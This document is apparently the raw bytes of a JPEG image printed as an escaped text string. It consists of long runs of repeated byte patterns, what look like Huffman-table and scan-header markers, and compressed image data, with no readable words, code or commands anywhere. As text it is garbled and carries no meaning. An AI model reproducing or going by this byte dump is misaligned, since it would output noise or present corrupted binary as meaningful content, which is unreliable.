cf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xce<\xc3O<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf2\x00A\x07\x15|\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xd2\x90A\x04\x10p\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\x84\x10A\x04\x10\x15\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf0$\x9eV\xbaN\xc5s\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x0c\xf2\xa7\n\xda\xee<\xe3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x1c\xd1\xef<\xf3\xcdx\xa3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf\x0b6\xfb~QY@\xe7\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf \xc7-}\xe3\xdc\xcd7\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\x8eg\xbf>\xb3\xcbGc\x8dO<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\x97\xbc\xf3\xc3\x8f<\xd3\xbc\xf7\xe5|\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xdf\xbf\xff\x00\xee\xa6\xebo\xff\x00\xfd\x95\xfc\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf2O\xbf\xff\x00\xed\xf4\'\x9f\xff\x00\xfa\xe9\xfc\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf1-\x7f\xff\x00\xf4\xfa\xb9\xbf\xff\x00\xfc\xb1t\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<T\x1c?\xff\x00\xff\x00\x8e_\xef\xff\x00\xec\xb0\x14\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xa4\x90\x97\xff\x00\xff\x00\xfe\xff\x00\xff\x00\xf8\x88#=\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<!\x83|7\xdfs\xc7\x1cq\xc2\x85|\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xc3\r<\xf3\xcf<\xf3L8\xd3L0\xc3\r8\xe3\xcd<\xe3\x0c0\xf3\xcf8\xd3\xcf<\xe3\x0c0\xd3\xcc4\xf3\xcf<\xf3\x8c4\xf3\xcf4\xe3\xcf<\xc3\x0f<\xe3\xcf<\xf3\x8c4\x83O<\xf3\xcf<\xc2\xcc4\xd3\x0f<\xd3\x0b\x10\xf3M<S\xcf,\x90\xc78\xe3\x0b8\xf3\xcf8S\xcf<\xb1H8C\xc7\x00s\x0e4\xf3\xca\x04\xf3J,\xc1O4R\x044\x92\n0\xc2N\x08\xb1O<\xf3\xcf<\xf3\xcf\x0c\xe1G<\xf0\x0e \xb3\xc5<P\xcf \xb1F8\x83\xcf8\xa3\xcf(\x03\xca<\xf3\x8f<\x90O\x10\xe2\x0f<\xf3\xce\x181@\x0c1N(S\x89<\xf1\x8e \xf1O\x0c\xa2\x0f<\xf3\xcf<\xb3\xcb,\xa3\xcf<\x91\xca\x08A\xc7\x1cP\xca,\xd1\x08\x08\xc2\xcb,\xa3\xcf\x1c\xb1\n<\xe3\xce<\xf3\xc5\x18\x82\xc74\xf3\xce<\xd1\x05(P\xc50q\xc6\x08#O\x0cs\x80$\xa3O<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcb,\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xb3\xc7<\xf3\xcf<\xf3\xcf<\xf2\xcb\x1c\xf3\xcf<\xf3\xcf<\xf3\xcf<1\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xff\xc4\x00.\x11\x00\x01\x03\x02\x03\x07\x03\x03\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x03\x04\x11\x05\x12\x15 1AQR`\x91\x10!S\x13a\xa10Bb\x90\xa0\xff\xda\x00\x08\x01\x02\x01\x01?\x00\xfe\x95\x8b\xc0_P,\xe1f\x07\x8a\x1d\x96V@\xb2\x05\x90/\xa6\xd4\xd1an\xcb\xb8\xd9.\x02\xdd\x93\xef\xedoI\xcb\x98A\x08T\xbf\x92}K\xcf\xb6\xe4\xda\x89\x07\xdd\x1a\xa7\x01\xb9D\xf7H\xfb\x94xvT\xec\xcc\xd5b.\x0e\xc54e\xad\xbfdGEU \x05\xb1:\xc5i5\x9f\x1a\xd2k>5\xa5V|J\\\x06\xb4\x9b\x88\xff\x00+A\xc4>?\xca\xd0q\x0f\x8cyQ\xe05\xc0\xdc\xc6<\xa1\x84V\r\xd1\xfeV\x93Y\xf1\xad&\xb3\xe3SQT\xc2.\xf8\x8d\xb9\xf6&\x1d\x1bd\xac\x89\xae\xdc\xb2\x96\xd8l\\r^\x16\xf5a\xc9e\x00\xfa\xb9\xa1\xc0\x83\xee\x15CZ\xc9\xe5kw\x07\x1e\xc3\xa2qeTDu n\x1b\xb3&#I\x19!\xd2\x85\x15u,\xa4\x06\xca\x11\x04l=\xc1\xadq\xe4.\xa4vi\x1ey\xb8\xf6\x1b\x1cZ\xf0\xeeJ\x13\x9a&\x1f\xe2\x0e\xc63Q$Lll6\xcc\x89<Jk\xaco{\x11\xb8\xac.\xa6I\xe9Ay\xb9\x06\xdb\x18\x84\x81\x94\xb2;\x98\xb2\xf7\xec>\x0b\n\x93=\x1c|\xc5\xc1\xd8\xc4iL\xf1\xdf\x8bT\x90J\xc7\x10XTT\xb3J\xeb\x06\x15GL)\xe1k}B\xc6\xe4-\xa7cA\xde\xee\xc5\xc1\x1fv\xcb\x1f\xdfd\xc6\xc3\xfbB\r`\xe0\x16\xfd\x8cjL\xd35\x9c\x07\xbfbYa\x95"\x19\xeeM\x81L{\x1e\xdc\xcd7\xfd\x19edL%\xcf\xb2\xaa\x9cO;\xdc;\x16\x9d\xf1\xb2F\x97\xee\x053\x15\xa0e\xac\xf3\xe1j\xf4=n\xf0\xb5z.\xb7xZ\xc5\x0fQ\xf0\xb5z.\xb7xZ\xbd\x17[\xbc-^\x8b\xad\xde\x16\xafE\xd6\xef\x0bW\xa2\xebw\x85&)@\xe68f&\xe3\x92\x903;\x8b\x06\xff\x00\xf7\xe7\xff\xc4\x00,\x11\x00\x01\x03\x01\x07\x03\x01\t\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x03\x11\x04\x12\x13 !Q`\x101A\x14"02Raq\x81\x90\xa0\xff\xda\x00\x08\x01\x03\x01\x01?\x00\xfd\x05W\x86\\%\x08\xca\xb8U\xc2\xa9\xc2\xc2\xbcPyE\xc5^<D\x02x]\x9d\xacp \xa3fg\xcc\x9bg\x8cjMS\xe1a\xfa!g\x07\xca\x90\x06F\x8f~\x15\x03\xa8UA\x19-2^7G\x08/`\xf2\xb1\x9a\xb1Y\xba\x12\xb12\xda\xc1\xa1^\xb2\r\xd1\xb6\xc0\xa4\xb6\xb0\x8a4\xacV\x15\x8a\xdd\xd6+wA\xed=\x8f\x04\x90\x90\xc3L\xa4\x05t+\xaa\x99+D\xde\xc3\x81\xc9\xf0\x142\rV\x1b\xf6Nk\x9b\xdce\xa6\xa0!\xd8p2+Tj\t\x1dJ\x89\x95=)S\xaa\x94\x00NH\xf5x\xe0\x85H(rF\xfb\xa5^\x1e\x11p\x03\xba&\xa6\xb9!\x1e\xd7\x03=&\x19\x7f(}\xeb\x96&\xd1\x8e(v\x1c\x08\xf4\x95\xb5\x08\x92=\xc1M\x05\xc9\x8d\xa3i\xc1\\\r4N\x86S\xe5`\xcb\xba\xc1\x91`\xc9\xb0X/\xd8\x05\x81"\xc0\x91`H\xb0$M\x86J\x84\x06\x8a\x9f\xdf\x97\xff\xc4\x00K\x10\x00\x02\x01\x02\x02\x04\x08\t\x0b\x02\x05\x03\x04\x03\x00\x00\x01\x02\x03\x00\x04\x05\x11\x10\x12!1\x06\x13\x15"AQTq\x14 0245as\xb1\x16#3BRSbpr\x81\x91D\x82@\x92\xa1\xc1\xd1$\x83\xa2CP`\xa0c\x80\xc0\xff\xda\x00\x08\x01\x01\x00\x01?\x02\xff\x00\xe9Z\x91\xbb\x9eh\xce\x93\x0f\x94\xef W&\x8f\xbc\xaeM\x1fyM\x87I\xf5X\x1axeO9\x7f&UK\x1c\x80\xa80\xfd\xc6O\xe2\x95UF\xc1\x97\x8av\xd4\xd6\x08\xdbSa\xa9#x\xdb&\x1f\x92\xd1\xc6\xd26\xaa\xd4\x16\xe9\x08\xdd\xb7\xaf\xc8\xcb\nJ\xb95O\x03B\xd9\x1d\xdd\x7f\x92\x88\x8c\xec\x00\xabx\x04)\xed\xe9\xf2rF\xb2.\xabT\xf0\xb4/\x91\xfc\x93\xb3\xb7\xe2\xd3X\xf9\xc7\xca\xdcB%B:z)\x94\xa9 \xfeH\xd8\xc1\xae\xfa\xc7p\xf2\xf7\xf0f8\xc1\xfb\xfeH(\xcc\x81QF#EQ\xe5\xc8\x0c\x085<F)\n\xfeG\xd8E\xac\xfa\xe7\xea\xf8\xb9\x8e\xba3D>\xb8\xaf\t\x83\xef\x05xT\x1fx+\xc2\xa0\xfb\xc1^\x13\x07\xde\n\x13\xc2\x7f\xf5\x05k/X\xf1q\x08\xb3@\xfd_\x91\xf6\xb1\xeaB\xa3\xa6\x9eX\xe3\xf3\x9a\x9f\x11A\xe6\xaet\xd7\xf3\x9d\xdb(\xcf3}sK\x0ec6c\\D}U\xc4\xc7\xd5\\T\x7ff\xb8\xa8\xfe\xcdq1\xfd\x9a\xe2#\xea\xaf\x07^\x82E3M\x1by\xe6\x96\xfau\xe9\xce\x93\x12\xfbkQ\xdcE\'\x9a\xd5"\xeb\xa3/X\xa6]V#\xab\xf26\x10\x0c\xab\x9e\xea\x9e\xfc\xf9\xb1n\xeb\xa2K\x1d\xa7L\t\x99\xcf\xaa\x9aT\x1d5\xe11\xfbhO\x19\xe9\xd2\xd3F:k\xc2c\xa1<g\xa6\xa6]u\xcf\xabNyn\xa8/\x9d66\xd1Wz\x86Mu\xdc\xdf\x92\\a\xd5\xd5\x1e v\x1b\x8d\x19\x1c\xefo\x129JwS\xf9\xdf\xfe\x9a\x08\x89\xa8\xed\xb5\xd8.{MI\x1bF\xe5Xm\x1eD\x02NB\xa5\xb1\x11\xdb!>q4b4A\x1f\x92\t\x1e{\xe8\x004[\xfd<}\xf5sg\x15\xc0\xda2=u.\x13p\xa7\x9b\xce\x15\xe0\x17\x7fti0\xcb\xa6\xfa\xb9TX<#\xcf$\xd3\xe1\x16\xe7\xcd$T\xb8U\xca\x9eo8W\x80]\xfd\xd1\xa8\xf0\xbb\xa6\xde2\xab\\:(9\xc7\x9c\xd5\x8a\x1elcKE\xd5\xf9\x1c7\xf8\x8auX\x1aS\xac\xa0\xfb<\x96&\xd9\xca\xa3\xa8x\x92y\xe7\xf2:&\xcfg\x89a.\xbc9t\xaf\x91$\x00OUL\xfcd\xac\xddgK\xb6K\xf9\x1c\xaaX\x80*[#\x1cj\xcb\xbco\xa5ma\xa6\xd6n*Pz\x0e\xfa\x04\x10\x08\xf2\x18\x85\xc6K\xc5\xae\xf3\xbfI9U\xbd\xb1\x98\xeb?\x9bSFcr\xa7\xf26\xc2\xdf/\x9c?\xb6\x8b\xabb\x87\x8c\x8f\xf7\x14\x1b[M\x9d\xe6\xaf1\xf7tV\xff\x00\x1a\xe6\xe9a^\xb6\xa6b\xccI\xdf\xa0\x90*\x08\x1av\xcc\xf9\x94\x00\x03!\xba\xaf-\xf8\xc4\xccy\xc3\xf2-acB\xdfn\xd3B\xe3/\xab^\x12~\xcdxI\xfb4\xf1\x82\xfa\xcb\xb2\xb5kV\xb5*\x0b\xa9"\x19o\x15\xca-\xf6\x05r\x8b}\x81\\\xa2\xdf`W(\xb7\xd8\x14\xd8\x84\x84lP(\xe6\xc72kV\xb5k\x8a\x04\x82N\xce\xaa\x17\x19\x0c\x82\xd7\x84\x9f\xb3^\x12~\xcdM\x16\xbb\x96\x1b)\xa3e\xfc\x88\x8139\xff\x00\x88\xf6S\xae\xab\x11\xf9\x0fo\xb8\xff\x00\x89\x9b\xe9\x0f\xe4=\xb9\xe7\x11\xfe&\xe26I6\xf4\xfeC\xda\xc1\xf3M!\xfd\xbc\x9cvs?FT0\xef\xc7G\x0e=\x0fRA${\xd7\xc9/\x9c*\xf6\rx\xb3\xe9_\xc8h\xa3\xe3\x1c-\x04\x015GU\x1f#il\x00\x0e\xc3oF\x8e,\xd6\xa3Q\\\xc6F\xae\xed\xf8\xa6\xccy\xa7\xc8\xc03\x90h\xbb\x8b\x8b\x94\xf5\x1d\xdf\x90\xb8|[\x0c\x87\xf6\xd1(\xc9\xcf\x90_8w\xd0\xdc(\x00\x06\x99\x07M^\x0c\xe0og\x91\xb6\x1b\xce\x8b\xd8x\xc8\xbd\xa3\xf2\x11\x14\xbb\x05\x1d5\x1a\x04@\xa3\xa3E\xc8\xe7\x0f!\xba\xa1\x90:+\n\x071\xa6C\xb3*\xbf\x90\x04\xd4\xcfi\xf26\xe3\x99\xa6\xe6>.f\x1f\x90xtY\xb9~\xad7\x03\x9b\xe4`\xb8hN\xcd\xd5\x15\xdcm\xb9\xbfj\x12\xfb)\xa6\x02\xa6\xbeE\xdd\xcejw.\xda\xc7\xc8\xae\xc5\x1aq\x08\xb5\x90?W\xe4\x1d\xb4|\\*4\xc83C\xe4\xc3\xb8\xdc\xc6\x8b1\xdeO\x92A\x9b\x0e\xff\x00\x11\xd7YH\xeb\xa7]V+\xd5\xf9\x03k\x1f\x192\x8f\x14\x8c\x89\xff\x00\x0bn>s\xc5\xc4#\xcaP\xdfk\xf2\x07\x0e\xfaf\xfd>,\xe3)\x0f\xf8[a\xb0\x9f\x17\x13\xdd\x1f\xef\xf9\x03i&\xa4\xc3\xdb\xb3\xc5\x92=qL\x8c\xbb\xc7\xf84\x85\x9b\xba\x80\xc8l\xf1q\x193u^\xaf\xc8+K\xb0\xe0#\xf9\xde$\xceUvV\xb3u\x9f\xf0bG\x1bs\xa0sP|K\x9b\x95\x84~*$\xb1$\xfeA\xc7{2{{\xeb\x94\x9b\xee\xeb\x94\x8f\xdd\xd3\xdf\xeb\x8c\xb8\xba\xf0\x9f\xc3^\x13\xf8k\xc2\x7f\rxO\xe1\xaf\t\xfc5\xe1?\x86\xbc\'\xf0\xd7\x84~\x1a\xf0\x8f\xc3^\x11\xf8k\xc2?\rxG\xe1\xaf\x08\xfc5\xe1\x1f\x86\xbc#\xf0\xd7\x84~\x1a\xf0\x8f\xc3^\x11\xf8k\xc2?\r\x0b\x9d\xbemr\x91\xfb\xba\xe53\xf7u\xcaM\xf7b\x9e\xfef\xdd\x90\xa2I\xdf\xff\x00\xda\xc4\x82\x0eD\x7f\xf2\xac\x89\xcfg\x97L6\xf9\xd02\xdb\xb9\x07q\xaeJ\xc4{+\xd7%b=\x95\xeb\x92\xb1\x1e\xca\xf5\xc9X\x8fez\x9a\x19a}I\x10\xabu\x1f)\x87\xe0/s\x10\x96I5\x14\xee\x19m\xacK\x07\x92\xc8\x07\r\xaf\x1f_Ua8Tw\xc9+4\x8c\xba\xa7-\x95\xf2f\x0e\xd0\xf5}n-\xae\xe5\x84\x1c\xc2\xf4\xe8\x82\xce\xe6\xe3\xe8\xa2f\xa7\xc1\xb1$\x19\x9bs\xfb\x10j+[\x89\x99\x968\x99\x88\xde*L:\xfa4.\xf6\xee\x14o40\xbc@\x8c\xfc\x19\xeb\x92\xb1\x1e\xca\xf5\xc9X\x8fez\xe4\xacG\xb2\xbdrV#\xd9^\x93\x0f\xbdvuX\x18\x9597\xb2\xb9+\x11\xec\xaf\\\x95\x88\xf6W\xaeJ\xc4{+\xd7%b=\x95\xf4a\xb8d\x16\x91)\xd5\x06L\xb9\xcdX\xfd\xb5\x99\x1cg\x1a\xa97W\xda\xd1\x1cRJ\xc1cB\xc7\xa8R\xe08\x93\x0c\xf8\xb0;\xcd\\\xe1\xb7\xb6\xc39!9u\x8d\xa2\xa1\xb1\xbb\x9d5\xe2\x85\x98u\x8a\x9a\xc6\xee\x04\xd7\x96\x16U\xeb> \x04\x90\x06\xf3\\\x95\x88\xf6W\xaeJ\xc4{+\xd7%b=\x95\xeb\x92\xb1\x1e\xca\xf5\xc9X\x8fez\xb4\xb1\x9a\xea\xe3\x89]\x84y\xd9\xf4T\x9c\x19\xf9\xbee\xc6o\xed\x1b)\xd1\x91\xd9XdA\xc8\xf8\xb1C,\xcf\xa9\x1a\x16n\xa1\\\x95\x88\xf6W\xaeJ\xc4{+\xd4\xb1I\x13\x94\x91uXo\x1e@\x02H\x03y\xaeJ\xc4{+\xd7%b=\x95\xea\\>\xf6$/$\x0c\xaa:i\x11\x9d\x82\xa8\xcc\x9d\xc2\xb9+\x11\xec\xaf\\\x95\x88\xf6W\xf1c\xc3\xefe@\xe9\x03\x15;\x8drV#\xd9^\xb9+\x11\xec\xafRY\xdd\xc5\xe7\xc1 \xfd\xbc\xa7%\xe2\x1d\x99\xeb\x92\xb1\x1e\xca\xf4p\xbc@\x7fK\'\xf1O\x14\x91\x9c\x9d\x19O\xb4e\xe3\xf2^ \x7f\xa6z\xe4\xacG\xb2\xbdK\x0c\xb0\xbe\xa4\x88U\xba\x8dCo<\xecV(\xcb\x11\xd5\\\x95\x88\xf6W\xa6\xc3/\xd5K\x1bg\x00o\xf1\xb9/\x10?\xd3=rV#\xd9^\xb9+\x11\xec\xaf\\\x95\x88\xf6W\xa9\xacn\xe0]iae\x1dg\xc5\x8a\t\xa6mX\xe3,}\x94\xb8\x06$\xc3\xccQ\xde\xd5&\x07\x89 \xcf\x89\xd6\xfd&\x9d\x1d\x1bU\x94\x83\xd4|x`\x9af\xd5\x89\x0b\x1fe\x0c\x03\x12#=E\x1f\xddW6\x17v\xdfK\t\x03\xafx\xa8\xac/%@\xf1\xc0\xcc\xa7\xa6\xa7\xb3\xba\x80\x03,,\xa0\xf5\xd2(gPX.gy\xe8\xac:\x0b8\xad\x82\xc0\xca\xe0\xf9\xcd\xd7X\xf6\x1b\x0ch."]]\xb90\xf2\xd8g\xa0Z\xfb\xb1Oyi\x1b\xf1o2\x06\xea\xcfD\xd70A\x97\x1b"\xa6{\xb3\xa4uu\x0c\xa70w\x1a\xe1\x07\xac[\xf4/\x94\xc2\xaf`\x9e\xd6 